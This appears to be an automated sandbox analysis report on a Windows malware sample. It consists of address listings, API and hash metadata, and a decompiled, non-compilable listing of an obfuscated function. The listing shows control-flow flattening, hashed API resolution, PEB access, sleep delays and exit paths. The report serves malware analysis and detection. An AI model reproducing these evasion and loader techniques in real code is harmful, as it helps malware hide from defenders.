                                                                                                                                                        0x00b76ac2
                                                                                                                                                        0x00b7680f
                                                                                                                                                        0x00b76dec
                                                                                                                                                        0x00b77894
                                                                                                                                                        0x00b778a1
                                                                                                                                                        0x00b778a6
                                                                                                                                                        0x00b778ae
                                                                                                                                                        0x00b778bb
                                                                                                                                                        0x00b778c3
                                                                                                                                                        0x00b76df2
                                                                                                                                                        0x00b76df8
                                                                                                                                                        0x00b778d5
                                                                                                                                                        0x00b778ea
                                                                                                                                                        0x00b778f2
                                                                                                                                                        0x00b77907
                                                                                                                                                        0x00b76dfe
                                                                                                                                                        0x00b76dfe
                                                                                                                                                        0x00b76e06
                                                                                                                                                        0x00b76e0c
                                                                                                                                                        0x00b76e0c
                                                                                                                                                        0x00b76e06
                                                                                                                                                        0x00b76df8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b76dec
                                                                                                                                                        0x00b7681b
                                                                                                                                                        0x00b7732c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7732c
                                                                                                                                                        0x00b76827
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b76829
                                                                                                                                                        0x00b76831
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b76837
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b76837
                                                                                                                                                        0x00b76831
                                                                                                                                                        0x00b7671c
                                                                                                                                                        0x00b7689f
                                                                                                                                                        0x00b76b5e
                                                                                                                                                        0x00b7711e
                                                                                                                                                        0x00b77aa4
                                                                                                                                                        0x00b77aaa
                                                                                                                                                        0x00b77ab2
                                                                                                                                                        0x00b77ac5
                                                                                                                                                        0x00b77aca
                                                                                                                                                        0x00b77ad0
                                                                                                                                                        0x00b77ad6
                                                                                                                                                        0x00b77add
                                                                                                                                                        0x00b77adf
                                                                                                                                                        0x00b77ae9
                                                                                                                                                        0x00b77124
                                                                                                                                                        0x00b77124
                                                                                                                                                        0x00b7712c
                                                                                                                                                        0x00b77132
                                                                                                                                                        0x00b77137
                                                                                                                                                        0x00b77137
                                                                                                                                                        0x00b7712c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7711e
                                                                                                                                                        0x00b76b6a
                                                                                                                                                        0x00b7765b
                                                                                                                                                        0x00b77667
                                                                                                                                                        0x00b7766f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b76b70
                                                                                                                                                        0x00b76b76
                                                                                                                                                        0x00b7767b
                                                                                                                                                        0x00b76b7c
                                                                                                                                                        0x00b76b7c
                                                                                                                                                        0x00b76b84
                                                                                                                                                        0x00b76b8f
                                                                                                                                                        0x00b76b94
                                                                                                                                                        0x00b76b99
                                                                                                                                                        0x00b76b9c
                                                                                                                                                        0x00b76ba1
                                                                                                                                                        0x00b76ba1
                                                                                                                                                        0x00b76b84
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b76b76
                                                                                                                                                        0x00b76b6a
                                                                                                                                                        0x00b768ab
                                                                                                                                                        0x00b76f41
                                                                                                                                                        0x00b76f4a
                                                                                                                                                        0x00b76f56
                                                                                                                                                        0x00b77940
                                                                                                                                                        0x00b7794f
                                                                                                                                                        0x00b77951
                                                                                                                                                        0x00b76f5c
                                                                                                                                                        0x00b76f5c
                                                                                                                                                        0x00b76f64
                                                                                                                                                        0x00b76f71
                                                                                                                                                        0x00b76f75
                                                                                                                                                        0x00b76f8d
                                                                                                                                                        0x00b76f8d
                                                                                                                                                        0x00b76f64
                                                                                                                                                        0x00b76f56
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b76f4a
                                                                                                                                                        0x00b768b7
                                                                                                                                                        0x00b77358
                                                                                                                                                        0x00b77364
                                                                                                                                                        0x00b7736c
                                                                                                                                                        0x00b77384
                                                                                                                                                        0x00b7738b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7738b
                                                                                                                                                        0x00b768c3
                                                                                                                                                        0x00b7739c
                                                                                                                                                        0x00b773ac
                                                                                                                                                        0x00b773bc
                                                                                                                                                        0x00b773bf
                                                                                                                                                        0x00b773c7
                                                                                                                                                        0x00b773c9
                                                                                                                                                        0x00b773d1
                                                                                                                                                        0x00b773d9
                                                                                                                                                        0x00b773ea
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b773ea
                                                                                                                                                        0x00b768c9
                                                                                                                                                        0x00b768d1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b768d7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b768d7
                                                                                                                                                        0x00b768d1
                                                                                                                                                        0x00b76728
                                                                                                                                                        0x00b769fb
                                                                                                                                                        0x00b7701b
                                                                                                                                                        0x00b77a13
                                                                                                                                                        0x00b77a1b
                                                                                                                                                        0x00b77a20
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b77a20
                                                                                                                                                        0x00b77021
                                                                                                                                                        0x00b77029
                                                                                                                                                        0x00b77037
                                                                                                                                                        0x00b7703f
                                                                                                                                                        0x00b77049
                                                                                                                                                        0x00b77057
                                                                                                                                                        0x00b7706b
                                                                                                                                                        0x00b7706b
                                                                                                                                                        0x00b76a01
                                                                                                                                                        0x00b76a07
                                                                                                                                                        0x00b774d1
                                                                                                                                                        0x00b774e9
                                                                                                                                                        0x00b774f5
                                                                                                                                                        0x00b774fd
                                                                                                                                                        0x00b77509
                                                                                                                                                        0x00b7751e
                                                                                                                                                        0x00b77523
                                                                                                                                                        0x00b76a0d
                                                                                                                                                        0x00b76a13
                                                                                                                                                        0x00b7752c
                                                                                                                                                        0x00b77532
                                                                                                                                                        0x00b77542
                                                                                                                                                        0x00b77550
                                                                                                                                                        0x00b77567
                                                                                                                                                        0x00b7756f
                                                                                                                                                        0x00b76a19
                                                                                                                                                        0x00b76a19
                                                                                                                                                        0x00b76a21
                                                                                                                                                        0x00b76a3a
                                                                                                                                                        0x00b76a3a
                                                                                                                                                        0x00b76a21
                                                                                                                                                        0x00b76a13
                                                                                                                                                        0x00b76a07
                                                                                                                                                        0x00b7672e
                                                                                                                                                        0x00b76734
                                                                                                                                                        0x00b76d47
                                                                                                                                                        0x00b77780
                                                                                                                                                        0x00b77784
                                                                                                                                                        0x00b7778c
                                                                                                                                                        0x00b77791
                                                                                                                                                        0x00b7779e
                                                                                                                                                        0x00b777b0
                                                                                                                                                        0x00b777c2
                                                                                                                                                        0x00b777d8
                                                                                                                                                        0x00b777e8
                                                                                                                                                        0x00b777fa
                                                                                                                                                        0x00b77806
                                                                                                                                                        0x00b7780a
                                                                                                                                                        0x00b77816
                                                                                                                                                        0x00b7781d
                                                                                                                                                        0x00b76d4d
                                                                                                                                                        0x00b76d53
                                                                                                                                                        0x00b7782d
                                                                                                                                                        0x00b77838
                                                                                                                                                        0x00b7783c
                                                                                                                                                        0x00b76d59
                                                                                                                                                        0x00b76d59
                                                                                                                                                        0x00b76d61
                                                                                                                                                        0x00b76d67
                                                                                                                                                        0x00b76d67
                                                                                                                                                        0x00b76d61
                                                                                                                                                        0x00b76d53
                                                                                                                                                        0x00b7673a
                                                                                                                                                        0x00b76740
                                                                                                                                                        0x00b7727a
                                                                                                                                                        0x00b77282
                                                                                                                                                        0x00b77297
                                                                                                                                                        0x00b76746
                                                                                                                                                        0x00b7674c
                                                                                                                                                        0x00b772a6
                                                                                                                                                        0x00b772aa
                                                                                                                                                        0x00b772c2
                                                                                                                                                        0x00b76752
                                                                                                                                                        0x00b76752
                                                                                                                                                        0x00b7675a
                                                                                                                                                        0x00b76760
                                                                                                                                                        0x00b76768
                                                                                                                                                        0x00b7676d
                                                                                                                                                        0x00b76770
                                                                                                                                                        0x00b76775
                                                                                                                                                        0x00b76775
                                                                                                                                                        0x00b7675a
                                                                                                                                                        0x00b7674c
                                                                                                                                                        0x00b76740
                                                                                                                                                        0x00b76734
                                                                                                                                                        0x00b76728

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00B7CDB9: RtlAllocateHeap.NTDLL(?,9FD7756B,079849AE,0701B759,?,00B80A77), ref: 00B7CE20
                                                                                                                                                        • WSAStartup.WS2_32 ref: 00B77416
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.482142058.0000000000B71000.00000020.00000001.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.482132217.0000000000B70000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.482167503.0000000000B84000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.482175737.0000000000B87000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateHeapStartup
                                                                                                                                                        • String ID: >en$?en$?en$[O$\O$\O$a'/$b'/$b'/$b'/
                                                                                                                                                        • API String ID: 1761151125-3790037689
                                                                                                                                                        • Opcode ID: 992b3a2e51049f5b4f1ee8d81303aa8e031c5bb5490aaf88099e212acc2056f3
                                                                                                                                                        • Instruction ID: 583001cb3ca830b1527bcdef72364f6cad135b732035ae3def8e39e453ee716b
                                                                                                                                                        • Opcode Fuzzy Hash: 992b3a2e51049f5b4f1ee8d81303aa8e031c5bb5490aaf88099e212acc2056f3
                                                                                                                                                        • Instruction Fuzzy Hash: 54A2427621DBC486CB789F19E4943AE77E1F7C8B44F90805ADA9EC7B64DB39C8408B41
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00B802A4, Relevance: 18.0, APIs: 3, Strings: 7, Instructions: 543COMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                                        			E00B802A4(void* __ebx, void* __ecx, void* __edx, signed int __esi, signed long long __rax, signed long long __rcx, char* __r8, void* __r9, void* __r11) {
				signed long long _v72;
				void* _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed long long _v104;
				void* _v112;
				signed long long _v120;
				intOrPtr _v124;
				signed long long _v136;
				signed int _v140;
				signed int _v144;
				intOrPtr _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _t111;
				void* _t115;
				void* _t196;
				signed int _t200;
				void* _t257;
				void* _t268;
				signed int _t269;
				signed int _t271;
				signed long long _t283;
				long long* _t284;
				long long* _t285;
				char* _t290;
				signed long long _t292;
				void* _t305;
				void* _t306;

				_t306 = __r11;
				_t305 = __r9;
				_t304 = __r8;
				_t292 = __rcx;
				_t283 = __rax;
				_t269 = __esi;
				_t196 = __ebx;
				_t290 = __r8;
				_t271 =  ==  ? 0xf29a3544 : 0x9fd7756b;
				r14d = 0x701b759;
				_t257 =  ==  ? r14d : 0xd9502225;
				_v84 = 0xd9502225;
				_t199 =  ==  ? 0xf29a3544 : 0xd4e563f;
				_v88 =  ==  ? 0xf29a3544 : 0xd4e563f;
				_t109 =  ==  ? r14d : 0xa912c783;
				_v92 =  ==  ? r14d : 0xa912c783;
				r15d = 0xda537fa7;
				r15d =  ==  ? 0x170b999c : r15d;
				_t111 = 0xca288c41;
				_t268 = 0x79849ae;
				while(1) {
					L1:
					_v120 = _t292;
					while(1) {
						L2:
						_t200 = _t111;
						if(_t111 > 0xf29a3543) {
							goto L10;
						}
						L3:
						if(_t200 <= 0xb0b3b625) {
							__eflags = _t200 - 0x93c76e2c;
							if(_t200 > 0x93c76e2c) {
								__eflags = _t200 - 0x9fd7756a;
								if(_t200 > 0x9fd7756a) {
									__eflags = _t200 - 0x9fd7756b;
									if(_t200 == 0x9fd7756b) {
										E00B7CDB9(0x30, _t283);
										_v104 = _t283;
										_t284 = _v104;
										_v112 = _t284;
										r8d = 0x18d1ea71;
										r9d = 0x2b;
										E00B7FAD7(1, _t269, _t284, _t292);
										 *_t284();
										_t285 =  *[gs:0x60];
										r8d = 0x27c2b783;
										r9d = 0xd;
										E00B7FAD7(1, _t269, _t285, _t292);
										r8d = 0x30;
										_t299 = _v112;
										r14d = 0x701b759;
										 *_t285();
										_t292 = 0xb802a4;
										_t283 =  *((intOrPtr*)(_v112 + 0x18)) + 0xb802a4;
										_v72 = _t283;
										__eflags =  *((intOrPtr*)(_t285 + 0x10)) - 0xb802a4;
										_t268 = 0x79849ae;
										_t111 =  >  ? 0xb0b3b626 : 0x2f0fb31e;
									} else {
										__eflags = _t200 - 0xa1a997a0;
										if(_t200 == 0xa1a997a0) {
											_v144 = r13d;
											__eflags = _v144 - 0x1520f;
											_t111 =  <  ? 0xea392f63 : 0x859994e5;
										} else {
											_t111 = _t200;
											__eflags = _t200 - 0xa912c783;
											if(_t200 == 0xa912c783) {
												__eflags =  *_t290;
												_t111 =  ==  ? r14d : 0x170b999c;
											}
										}
									}
									while(1) {
										L2:
										_t200 = _t111;
										if(_t111 > 0xf29a3543) {
											goto L10;
										}
										goto L3;
									}
								}
								__eflags = _t200 - 0x93c76e2d;
								if(_t200 == 0x93c76e2d) {
									_t292 = _v136;
									E00B7A4E4(_t292);
									L107:
									_t111 = 0xb42b969a;
									while(1) {
										L2:
										_t200 = _t111;
										if(_t111 > 0xf29a3543) {
											goto L10;
										}
										goto L3;
									}
									goto L10;
								}
								__eflags = _t200 - 0x945c137a;
								if(_t200 == 0x945c137a) {
									goto L107;
								} else {
									_t111 = _t200;
									__eflags = _t200 - 0x9a2c0e1f;
									if(_t200 == 0x9a2c0e1f) {
										r13d = _v144;
										r13d = r13d + 3;
										_t111 = 0xa1a997a0;
									}
									continue;
								}
							}
							__eflags = _t200 - 0x859994e4;
							if(_t200 > 0x859994e4) {
								__eflags = _t200 - 0x859994e5;
								if(_t200 == 0x859994e5) {
									__eflags = _v152 + _v164 + _v156 - 0xf302e;
									_t111 =  ==  ? 0x6dc18416 : 0x2e98952d;
									continue;
								}
								__eflags = _t200 - 0x91685319;
								if(_t200 == 0x91685319) {
									_t111 = 0xbe5a0f3f;
									continue;
								}
								_t111 = _t200;
								__eflags = _t200 - 0x91ac664b;
								if(_t200 != 0x91ac664b) {
									continue;
								}
								_t292 = _v136;
								__eflags = E00B7A8E0(_t292);
								_t115 = 0x51fb7187;
								L112:
								_t111 =  !=  ? 0xb42b969a : _t115;
								continue;
							}
							__eflags = _t200 - 0x834d46ed;
							if(_t200 == 0x834d46ed) {
								_v152 = (_v156 + 0xfffffffc) * _v164 - _v144 * _v140;
								_v164 = _t292 + _t283 * 2 - _v140 + 0xfffffc19;
								_t261 =  ~(_v152 + _v164) * _v156;
								_v156 = _t292 + _t292 * 2 + _t283 + _t292 * 8 +  ~(_v152 + _v164) * _v156;
								r12d = _v140;
								r12d = r12d + 5;
								_t111 = 0x34527dc1;
								continue;
							}
							__eflags = _t200 - 0x843901b2;
							if(_t200 == 0x843901b2) {
								__eflags = _v148 - 4;
								_t111 =  <  ? 0xe4701c02 : 0x13aae927;
								continue;
							}
							_t111 = _t200;
							__eflags = _t200 - 0x854a966f;
							if(_t200 == 0x854a966f) {
								return _t111;
							} else {
								continue;
							}
						}
						if(_t200 > 0xca288c40) {
							__eflags = _t200 - 0xe4701c01;
							if(_t200 > 0xe4701c01) {
								__eflags = _t200 - 0xe4701c02;
								if(_t200 == 0xe4701c02) {
									__eflags = _v148 - 2;
									_t111 =  <  ? _t268 : 0x91685319;
									continue;
								}
								__eflags = _t200 - 0xea392f63;
								if(_t200 == 0xea392f63) {
									_t111 = 0x34527dc1;
									r12d = 0;
									continue;
								}
								_t111 = _t200;
								__eflags = _t200 - 0xeb6755e2;
								if(_t200 != 0xeb6755e2) {
									continue;
								}
								__eflags = _v148 - 4;
								L96:
								_t111 =  ==  ? _t268 : 0x91685319;
							} else {
								_t111 = r15d;
								__eflags = _t200 - 0xca288c41;
								if(_t200 != 0xca288c41) {
									__eflags = _t200 - 0xd9502225;
									if(_t200 == 0xd9502225) {
										 *_t290 = 0;
										_t111 = 0x701b759;
									} else {
										_t111 = _t200;
										__eflags = _t200 - 0xda537fa7;
										if(_t200 == 0xda537fa7) {
											_t111 = _v92;
										}
									}
								}
							}
							continue;
						}
						if(_t200 > 0xc10a918e) {
							__eflags = _t200 - 0xc10a918f;
							if(_t200 == 0xc10a918f) {
								__eflags = _v148 - 8;
								goto L96;
							}
							__eflags = _t200 - 0xc7704248;
							if(_t200 == 0xc7704248) {
								__eflags = _v160 - 8;
								_t111 =  ==  ? 0x93c76e2d : 0x945c137a;
							} else {
								_t111 = _t200;
								__eflags = _t200 - 0xc88989fd;
								if(_t200 == 0xc88989fd) {
									_t283 = _v80;
									_v160 =  *_t283;
									_t111 = 0x7c8c10e9;
								}
							}
							continue;
						}
						if(_t200 <= 0xbe5a0f3e) {
							__eflags = _t200 - 0xb0b3b626;
							if(_t200 != 0xb0b3b626) {
								_t111 = _t200;
								__eflags = _t200 - 0xb42b969a;
								if(_t200 != 0xb42b969a) {
									continue;
								}
								E00B73998(_v136);
								E00B80C45();
								__eflags = 0;
								ExitProcess(??);
							}
							_v120 = _t283;
							r8d = 0x30;
							E00B7C8BC(0, _t283, _v104, _t304, _t306);
							_t261 = 1;
							r8d = 0x27c2b783;
							r9d = 0xd;
							E00B7FAD7(1, _t269, _t283, _v104);
							r8d = 0x30;
							_t292 = 0xb802a4;
							_t299 = _v112;
							_t268 = 0x79849ae;
							 *_t283();
							_t283 = _v112;
							__eflags =  *((intOrPtr*)(_t283 + 0x28)) - 0x1000000;
							_t111 =  ==  ? 0x48479475 : 0x27daf151;
						} else {
							if(_t200 == 0xbe5a0f3f) {
								_t111 = 0x63da8ac0;
								_v124 = 0x3e8;
							} else {
								_t111 = _t200;
								if(_t200 == 0xbf82bb62) {
									_t111 =  ==  ? 0x91ac664b : 0x945c137a;
								}
							}
						}
						continue;
						L10:
						__eflags = _t200 - 0x2e98952c;
						if(_t200 > 0x2e98952c) {
							__eflags = _t200 - 0x5c545ed3;
							if(_t200 > 0x5c545ed3) {
								__eflags = _t200 - 0x7c8c10e8;
								if(_t200 > 0x7c8c10e8) {
									__eflags = _t200 - 0x7c8c10e9;
									if(_t200 == 0x7c8c10e9) {
										__eflags = _v160 - 2;
										_t111 =  <  ? 0x537690ef : 0xe1b9813;
										continue;
									}
									__eflags = _t200 - 0x7d4a3cd4;
									if(_t200 == 0x7d4a3cd4) {
										_t292 = _v136;
										__eflags = E00B7A504(_t261, _t268, _t271, _t283, _t292, _t305);
										_t115 = 0x91ac664b;
										goto L112;
									}
									_t111 = _t200;
									__eflags = _t200 - 0x7da7801f;
									if(_t200 == 0x7da7801f) {
										__eflags = _v160;
										_t111 =  ==  ? 0x51fb7187 : 0x945c137a;
									}
									continue;
								}
								__eflags = _t200 - 0x5c545ed4;
								if(_t200 == 0x5c545ed4) {
									__eflags = 0;
									r8d = 0x510b3a3e;
									r9d = 0x5c;
									E00B7FAD7(1, _t269, _t283, _t292);
									ExitProcess(??);
								}
								__eflags = _t200 - 0x63da8ac0;
								if(_t200 == 0x63da8ac0) {
									r8d = 0x9d3c7b7a;
									r9d = 0xb2;
									E00B7FAD7(1, _t269, _t283, _t292);
									SleepEx(??, ??); // executed
									_t261 = 0x20;
									E00B79F06(0x20, _t269, _v136, _t299, _t304, _t306);
									_t299 = _v136 + _t283;
									_t292 = _v136 + _t283;
									__eflags = E00B73A22(_t283, _t292, _v136 + _t283);
									_t111 =  !=  ? 0x5c545ed4 : 0xc88989fd;
								} else {
									_t111 = _t200;
									__eflags = _t200 - 0x6dc18416;
									if(_t200 == 0x6dc18416) {
										_v152 = _v152 + _v164 - (_v156 << 4);
										_v164 = _v156 + _t292 + _t292 * 2 + 0xffffffb3;
										_t111 = 0x2e98952d;
									}
								}
								continue;
							}
							__eflags = _t200 - 0x48479474;
							if(_t200 > 0x48479474) {
								__eflags = _t200 - 0x48479475;
								if(_t200 == 0x48479475) {
									_t111 = 0x27daf151;
									while(1) {
										L1:
										_v120 = _t292;
										goto L2;
									}
								}
								__eflags = _t200 - 0x51fb7187;
								if(_t200 == 0x51fb7187) {
									_t292 = _v136;
									E00B7C32D(_t261, _t283, _t292, _t306);
									goto L107;
								}
								_t111 = _t200;
								__eflags = _t200 - 0x537690ef;
								if(_t200 == 0x537690ef) {
									__eflags = _v160;
									_t111 =  <=  ? 0x7da7801f : 0x7d4a3cd4;
								}
								continue;
							}
							__eflags = _t200 - 0x2e98952d;
							if(_t200 == 0x2e98952d) {
								E00B7CDB9(0xc40, _t283);
								_v136 = _t283;
								_t292 = _v136;
								_t261 = 0x10;
								E00B79F06(0x10, _t269, _t292, _t299, _t304, _t306);
								_v80 = _v136 + _t292;
								_t283 = _v80;
								_v148 =  *_t283;
								_t111 = 0x843901b2;
								continue;
							}
							__eflags = _t200 - 0x2f0fb31e;
							if(_t200 == 0x2f0fb31e) {
								_t283 = _v72;
								_t292 = 0xb802a4;
								__eflags = _t283 - 0xb802a4;
								_t111 =  <  ? 0xb0b3b626 : 0x27daf151;
								goto L1;
							} else {
								_t111 = _t200;
								__eflags = _t200 - 0x34527dc1;
								if(_t200 == 0x34527dc1) {
									_v140 = r12d;
									__eflags = _v140 - 0x2b4;
									_t111 =  <  ? 0x834d46ed : 0x9a2c0e1f;
								}
								continue;
							}
						}
						__eflags = _t200 - 0x13aae926;
						if(_t200 > 0x13aae926) {
							__eflags = _t200 - 0x18cf248b;
							if(_t200 > 0x18cf248b) {
								__eflags = _t200 - 0x18cf248c;
								if(_t200 == 0x18cf248c) {
									__eflags = _v160 - 0x40;
									_t111 =  ==  ? 0x187c6430 : 0x945c137a;
								} else {
									__eflags = _t200 - 0x27daf151;
									if(_t200 == 0x27daf151) {
										E00B7CC2E(_t283, _v104);
										_t111 = 0xf29a3544;
										_t292 = _v120;
										_t269 = _t200;
									} else {
										_t111 = _t200;
										__eflags = _t200 - 0x28c5e58b;
										if(_t200 == 0x28c5e58b) {
											r13d = 0;
											_v152 = r13d;
											_v164 = r13d;
											_v156 = r13d;
											_t111 = 0xa1a997a0;
										}
									}
								}
								continue;
							}
							__eflags = _t200 - 0x13aae927;
							if(_t200 == 0x13aae927) {
								__eflags = _v148 - 8;
								_t111 =  <  ? 0xeb6755e2 : 0xc10a918f;
								continue;
							}
							__eflags = _t200 - 0x170b999c;
							if(__eflags == 0) {
								E00B7FC4D(_t196, _t261, _t268, _t269, __eflags, _t283, _t292, _t304, _t305, _t306);
								_t111 = _v84;
								continue;
							}
							_t111 = _t200;
							__eflags = _t200 - 0x187c6430;
							if(_t200 != 0x187c6430) {
								continue;
							} else {
								_t261 = 1;
								r8d = 0x510b3a3e;
								r9d = 0x5c;
								E00B7FAD7(1, _t269, _t283, _t292);
								 *_t283();
								goto L107;
							}
						} else {
							__eflags = _t200 - 0x79849ad;
							if(_t200 > 0x79849ad) {
								__eflags = _t200 - 0x79849ae;
								if(_t200 == 0x79849ae) {
									_t111 = 0x63da8ac0;
									_v124 = 0x7530;
								} else {
									__eflags = _t200 - 0xd4e563f;
									if(_t200 == 0xd4e563f) {
										_t269 = 0;
										_t111 = _t271;
									} else {
										_t111 = _t200;
										__eflags = _t200 - 0xe1b9813;
										if(_t200 == 0xe1b9813) {
											__eflags = _v160 - 8;
											_t111 =  <  ? 0xbf82bb62 : 0xfbdae760;
										}
									}
								}
							} else {
								__eflags = _t200 - 0xf29a3544;
								if(_t200 == 0xf29a3544) {
									__eflags = (_t269 ^ 0x000000fe) & sil;
									_t111 =  ==  ? 0x28c5e58b : 0x854a966f;
								} else {
									__eflags = _t200 - 0xfbdae760;
									if(_t200 == 0xfbdae760) {
										__eflags = _v160 - 0x40;
										_t111 =  <  ? 0xc7704248 : 0x18cf248c;
									} else {
										_t111 = _t200;
										__eflags = _t200 - 0x701b759;
										if(_t200 == 0x701b759) {
											_t269 = 0;
											_t111 = _v88;
										}
									}
								}
							}
							continue;
						}
					}
				}
			}



































                                                                                                                                                        0x00b802a4
                                                                                                                                                        0x00b802a4
                                                                                                                                                        0x00b802a4
                                                                                                                                                        0x00b802a4
                                                                                                                                                        0x00b802a4
                                                                                                                                                        0x00b802a4
                                                                                                                                                        0x00b802a4
                                                                                                                                                        0x00b802b7
                                                                                                                                                        0x00b802c6
                                                                                                                                                        0x00b802cc
                                                                                                                                                        0x00b802d7
                                                                                                                                                        0x00b802db
                                                                                                                                                        0x00b802e6
                                                                                                                                                        0x00b802e9
                                                                                                                                                        0x00b802f2
                                                                                                                                                        0x00b802f6
                                                                                                                                                        0x00b802fa
                                                                                                                                                        0x00b80305
                                                                                                                                                        0x00b80309
                                                                                                                                                        0x00b8030e
                                                                                                                                                        0x00b80313
                                                                                                                                                        0x00b80313
                                                                                                                                                        0x00b80313
                                                                                                                                                        0x00b80318
                                                                                                                                                        0x00b80318
                                                                                                                                                        0x00b80318
                                                                                                                                                        0x00b8031f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b80321
                                                                                                                                                        0x00b80327
                                                                                                                                                        0x00b803d2
                                                                                                                                                        0x00b803d8
                                                                                                                                                        0x00b804b1
                                                                                                                                                        0x00b804b7
                                                                                                                                                        0x00b80656
                                                                                                                                                        0x00b8065c
                                                                                                                                                        0x00b80a72
                                                                                                                                                        0x00b80a77
                                                                                                                                                        0x00b80a7c
                                                                                                                                                        0x00b80a81
                                                                                                                                                        0x00b80a8d
                                                                                                                                                        0x00b80a93
                                                                                                                                                        0x00b80a99
                                                                                                                                                        0x00b80aa0
                                                                                                                                                        0x00b80aa2
                                                                                                                                                        0x00b80abe
                                                                                                                                                        0x00b80ac4
                                                                                                                                                        0x00b80aca
                                                                                                                                                        0x00b80acf
                                                                                                                                                        0x00b80ad8
                                                                                                                                                        0x00b80ade
                                                                                                                                                        0x00b80ae4
                                                                                                                                                        0x00b80aef
                                                                                                                                                        0x00b80af6
                                                                                                                                                        0x00b80af9
                                                                                                                                                        0x00b80b01
                                                                                                                                                        0x00b80b04
                                                                                                                                                        0x00b80b13
                                                                                                                                                        0x00b80662
                                                                                                                                                        0x00b80662
                                                                                                                                                        0x00b80668
                                                                                                                                                        0x00b80b1b
                                                                                                                                                        0x00b80b24
                                                                                                                                                        0x00b80b33
                                                                                                                                                        0x00b8066e
                                                                                                                                                        0x00b8066e
                                                                                                                                                        0x00b80670
                                                                                                                                                        0x00b80676
                                                                                                                                                        0x00b8067c
                                                                                                                                                        0x00b80684
                                                                                                                                                        0x00b80684
                                                                                                                                                        0x00b80676
                                                                                                                                                        0x00b80668
                                                                                                                                                        0x00b80318
                                                                                                                                                        0x00b80318
                                                                                                                                                        0x00b80318
                                                                                                                                                        0x00b8031f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b8031f
                                                                                                                                                        0x00b80318
                                                                                                                                                        0x00b804bd
                                                                                                                                                        0x00b804c3
                                                                                                                                                        0x00b80931
                                                                                                                                                        0x00b80936
                                                                                                                                                        0x00b80b60
                                                                                                                                                        0x00b80b60
                                                                                                                                                        0x00b80318
                                                                                                                                                        0x00b80318
                                                                                                                                                        0x00b80318
                                                                                                                                                        0x00b8031f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b8031f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b80318
                                                                                                                                                        0x00b804c9
                                                                                                                                                        0x00b804cf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b804d5
                                                                                                                                                        0x00b804d5
                                                                                                                                                        0x00b804d7
                                                                                                                                                        0x00b804dd
                                                                                                                                                        0x00b804e3
                                                                                                                                                        0x00b804e8
                                                                                                                                                        0x00b804ec
                                                                                                                                                        0x00b804ec
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b804dd
                                                                                                                                                        0x00b804cf
                                                                                                                                                        0x00b803de
                                                                                                                                                        0x00b803e4
                                                                                                                                                        0x00b805e8
                                                                                                                                                        0x00b805ee
                                                                                                                                                        0x00b80a2b
                                                                                                                                                        0x00b80a3a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b80a3a
                                                                                                                                                        0x00b805f4
                                                                                                                                                        0x00b805fa
                                                                                                                                                        0x00b80a42
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b80a42
                                                                                                                                                        0x00b80600
                                                                                                                                                        0x00b80602
                                                                                                                                                        0x00b80608
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b8060e
                                                                                                                                                        0x00b80618
                                                                                                                                                        0x00b8061a
                                                                                                                                                        0x00b80bc8
                                                                                                                                                        0x00b80bcd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b80bcd
                                                                                                                                                        0x00b803ea
                                                                                                                                                        0x00b803f0
                                                                                                                                                        0x00b8085c
                                                                                                                                                        0x00b8087f
                                                                                                                                                        0x00b808a1
                                                                                                                                                        0x00b808af
                                                                                                                                                        0x00b808b3
                                                                                                                                                        0x00b808b8
                                                                                                                                                        0x00b808bc
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b808bc
                                                                                                                                                        0x00b803f6
                                                                                                                                                        0x00b803fc
                                                                                                                                                        0x00b808ca
                                                                                                                                                        0x00b808d7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b808d7
                                                                                                                                                        0x00b80402
                                                                                                                                                        0x00b80404
                                                                                                                                                        0x00b8040a
                                                                                                                                                        0x00b80c2a
                                                                                                                                                        0x00b80410
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b80410
                                                                                                                                                        0x00b8040a
                                                                                                                                                        0x00b80333
                                                                                                                                                        0x00b80473
                                                                                                                                                        0x00b80479
                                                                                                                                                        0x00b80624
                                                                                                                                                        0x00b8062a
                                                                                                                                                        0x00b80a50
                                                                                                                                                        0x00b80a58
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b80a58
                                                                                                                                                        0x00b80630
